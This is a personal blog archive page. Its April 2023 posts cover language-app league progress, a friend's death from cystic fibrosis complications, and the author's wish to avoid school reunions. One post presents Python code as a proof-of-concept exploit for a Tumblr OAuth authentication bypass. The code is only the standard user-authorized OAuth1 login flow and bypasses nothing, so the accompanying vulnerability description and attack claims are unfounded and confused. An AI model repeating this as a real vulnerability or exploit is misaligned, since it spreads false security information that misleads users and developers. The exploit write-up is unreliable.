personal | serah[DOT]nu

Archive of ‘personal’ category

16
Apr
2023

Well, it’s been an admirable effort so far…

categories: personal, phone & tablet apps; word count: 311 words

I thought that I was going to be happy continuing to stay in the Emerald League since I found out that one of my friends had passed away on Easter Sunday, but… sometime between yesterday evening and now I’m in the top seven of the Emerald League and on track to be promoted from it unless someone manages to bump me down several places at the last possible minute (or two, or three). German has become slightly less difficult to learn as I’ve continued to make progress in it, although I continue to be a Rookie in both French and German. I’m pretty sure that I know more French and German than I ever learned Spanish two courses into high school, but that might have something to do with how horrible the district I graduated in is. With the exception of the most rudimentary things, I haven’t managed to hang onto anything that I “learned” the whole way through secondary school… and I did most of my own teaching myself, to myself, on my off time because it was like asking any of my teachers for help grievously inconvenienced them. Next year I’m sure people from my graduating class will begin planning what’s supposed to be our twenty-year reunion, and I’ve continued to make it clear that I don’t want to be invited to this because I don’t even want to be contacted by members of my graduating class. It’s actually in my permanent record at the high school that I’m not to be included in any alumni activities or contacted for reunions, or… well, contacted for any reason. The principal put that note in herself and so far, with graduation, I haven’t been contacted by anyone from my graduating class for almost all of the time I’ve spent a high school graduate. It is what it is at this point.

14
Apr
2023

So Jade’s Celebration of Life was held today.

categories: personal; word count: 21 words

Now everyone who knew her has to… get used to her not being here any more, which is going to suck.

13
Apr
2023

I really wish I didn’t have to make this post.

categories: personal; word count: 259 words

My Wordless Wednesday post may have alluded to it, but I wanted to make a more official post about it in here — my friend Jade, whose picture I posted on yesterday’s Wordless Wednesday, passed away from complications of cystic fibrosis and her second transplant on what wound up being Easter Sunday. Due to Facebook’s algorithm, I didn’t find out that she had passed until a day and a half after it had happened, and it wasn’t something that I wanted to find out even though I knew in the back of my mind that the day would come at some point, that she seemed like she had also gotten the same type of rejection in her new set of lungs that she had gotten the time before. She just seemed like she wasn’t doing particularly well leading up to her death, but I did enjoy the posts that her husband made on her behalf letting everyone who knew her know that she was continuing to fight. So it makes sense that he would be the one to write the final post on her behalf, which served to let everyone know that she had passed away. There will be an informal Celebration of Life streamed on her Facebook page for her friends in the coming days, and that’s something that I aim to be present for since I’ve known her for years (since even before her first transplant, in fact!).

Breathe easy, Jade. No one who knew you will ever forget you. Now you get to see your mom again.

12
Apr
2023

Wordless Wednesday: April 12th, 2023

categories: personal; word count: 0 words

11
Apr
2023

These kids are goofballs and I love them for it.

categories: personal; word count: 17 words

They’re utter goofballs with each other and I wouldn’t have it any other way. Seriously! I wouldn’t.

09
Apr
2023

Since Tumblr still predictably will not fix this…

categories: personal; word count: 468 words

I’ve decided to post the proof of concept code up here. My purpose in doing so is to illustrate that me having been mentioning this exploit was, and always has been, worth the time I’ve taken to mention this exploit, as is it intended to allow Tumblr users or those who are at any point considering using Tumblr to make a more informed decision about blogging on it or trusting the site with any of their potentially sensitive information.

Python requests OAuthlib library, a widely used OAuth library that is vulnerable to an OAuth authentication bypass vulnerability in the Tumblr API that could allow an attacker to bypass authentication and access protected resources. This vulnerability exists because the code does not properly validate OAuth tokens, and it does not use HTTPS when sending sensitive data.

An attacker can exploit this vulnerability by sending a specially crafted OAuth token request to the Tumblr API, bypassing authentication and gaining unauthorized access to protected resources.

The following proof of concept code demonstrates how an attacker can exploit this vulnerability:

import requests
from requests_oauthlib import OAuth1

Set your OAuth consumer key and secret
CONSUMER_KEY = ‘your_consumer_key’
CONSUMER_SECRET = ‘your_consumer_secret’

Set the Tumblr API endpoints
REQUEST_TOKEN_URL = ‘http://www.tumblr.com/oauth/request_token’
AUTHORIZE_URL = ‘http://www.tumblr.com/oauth/authorize’
ACCESS_TOKEN_URL = ‘http://www.tumblr.com/oauth/access_token’

Send a request for a temporary OAuth token
oauth = OAuth1(CONSUMER_KEY, client_secret=CONSUMER_SECRET)
response = requests.post(url=REQUEST_TOKEN_URL, auth=oauth)

Parse the response for the temporary token and secret
data = response.text.split(‘&’)
oauth_token = data[0].split(‘=’)[1]
oauth_token_secret = data[1].split(‘=’)[1]

Direct the user to authorize the app
authorize_url = AUTHORIZE_URL + ‘?oauth_token=’ + oauth_token
print(‘Please authorize the app at this URL: ‘ + authorize_url)
oauth_verifier = input(‘Enter the verification code: ‘)

Exchange the temporary token for a permanent token
oauth = OAuth1(CONSUMER_KEY,
client_secret=CONSUMER_SECRET,
resource_owner_key=oauth_token,
resource_owner_secret=oauth_token_secret,
verifier=oauth_verifier)
response = requests.post(url=ACCESS_TOKEN_URL, auth=oauth)

Parse the response for the permanent token and secret
data = response.text.split(‘&’)
oauth_token = data[0].split(‘=’)[1]
oauth_token_secret = data[1].split(‘=’)[1]
Use the permanent token and secret to make authenticated API requests
oauth = OAuth1(CONSUMER_KEY,
client_secret=CONSUMER_SECRET,
resource_owner_key=oauth_token,
resource_owner_secret=oauth_token_secret)
response = requests.get(url=’https://api.tumblr.com/v2/user/info’, auth=oauth)
print(response.text)

In summary, an attacker could exploit this vulnerability to bypass authentication and gain access to sensitive information or modify data on behalf of a legitimate user. The exploit is well-known by hacking communities.

Previous 1 … 115 116 117 118 119 … 262 Next